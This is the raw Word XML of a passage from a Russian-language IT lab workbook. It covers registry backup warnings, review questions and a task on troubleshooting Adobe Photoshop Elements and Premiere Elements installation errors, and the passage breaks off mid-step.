    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пользователям не нужно вручную вносить изменения в реестр, поскольку обычно все необходимые изменения выполняются программами и приложениями автоматически. Неправильное изменение параметров реестра может привести компьютер в неработоспособное состояние. Однако в случае повреждения файла реестра изменения могут быть необходимы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Корпорация Майкрософт настоятельно рекомендует создать резервную копию реестра перед внесением в него каких-либо изменений, а также изменять только те параметры, назначение которых вам известно, или на которые вам указал источник, которому вы доверяете.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое межпроцессное взаимодействие?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое реестр Windows?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. У всех ли операционных систем имеется реестр?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="003C7D91" w:rsidP="003C7D91">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00100B8E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Выявление и устранение проблем установки ПО для обработки графики. Составление инструкций для пользователя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проблемы при установке могут быть вызваны многими факторами, включая конфликтующие элементы автозагрузки, некорректные данные в реестре Windows и конфликты оборудования. Выполните описанные ниже действия по устранению неполадок для устранения большинства типов проблем при установке, включая следующие:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пустое или мерцающее диалоговое окно</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Неподвижный курсор или экран, синий экран или неожиданная перезагрузка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сообщение об ошибке, например:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эта программа выполнила недопустимую операцию и будет закрыта. Если проблема не решилась, обратитесь к поставщику программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка программного интерфейса приложения (API) набора средств настройки MS, недопустимый аргумент 3: AddSectionFiles to CopyList</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Недостаточно места на целевом диске для разархивирования в [путь к папке]</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка не может запустить программу настройки. Может быть ошибка сценария</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка не может загрузить файл сценария установки</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Невозможно создать каталог в C:\Windows\System. Проверьте права доступа на запись в каталог</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X:\ не доступен.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (где </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Х</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – буква диска для вашего дисковода CD-ROM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устройство не готово</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00E656E5" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка чтения дисковода CD-ROM.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка чтения устройства X:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (где </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – буква диска для вашего дисковода CD-ROM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="main-pars_header_1"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="main-pars_text_0"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы наиболее эффективно использовать настоящий документ, соблюдайте следующие рекомендации:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполняйте действия по порядку. Соблюдайте порядок действий по устранению проблем, указанный в настоящем документе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пробуйте выполнить установку после каждого действия.После выполнения действия снова пробуйте выполнить установку, чтобы увидеть, не была ли устранена проблема. Если проблема не была устранена, переходите к следующему действию по устранению проблемы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отслеживайте результаты.Ведите учет выполняемых действий и записывайте результаты каждого шага, в том числе ошибки и иные проблемы. Если вы свяжетесь со Службой технической поддержки Adobe, она будет использовать эту информацию для оказания наилучшей поддержки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполняйте перезагрузку после каждой попытки установки или после каждой ошибки. Всегда перезагружайте компьютер, если произошел сбой установки или возникла ошибка, чтобы обновить память. Если Вы продолжите работу без перезагрузки компьютера, это может лишь усугубить проблему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание! Некоторые из процедур, описанных в этом документе, могут вызвать диалоговое окно Контроль учетных записей с требованием подтверждения продолжения процедуры. Ознакомьтесь с информацией в этом диалоговом окне, чтобы определить свои дальнейшие действия. В случае отмены диалогового окна выполнение соответствующего действия по устранению неполадок будет невозможно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="main-pars_header_2"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устранение мелких неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="main-pars_header_3"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Убедитесь, что ваша система соответствует минимальным требованиям.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="main-pars_text_1"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для установкиPhotoshop Elements или Premiere Elements ваша система должна соответствовать или превосходить системные требования. См. самую последнюю информацию о системных требованиях в </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Технических характеристиках Photoshop Elements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Технических характеристиках Premiere Elements</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы проверить основную системную информацию, например, скорость процессора и объем оперативной памяти, выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск &gt; Панель управления &gt; Система</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="main-pars_header_4"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Удалите установленные ранее файлы приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="main-pars_text_2"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы удалить файлы после предыдущей попытки установки, выполните следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="step_par_text"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переместите все свои личные файлы (например, изображения, видео или сторонние плагины) из папок Photoshop Elements, Premiere Elements и Elements Organizer и соответствующих вложенных папок с целью резервного копирования для безопасного хранения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На панели задач правой кнопкой мыши нажмите кнопку меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 8 / Windows 10) или нажмите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
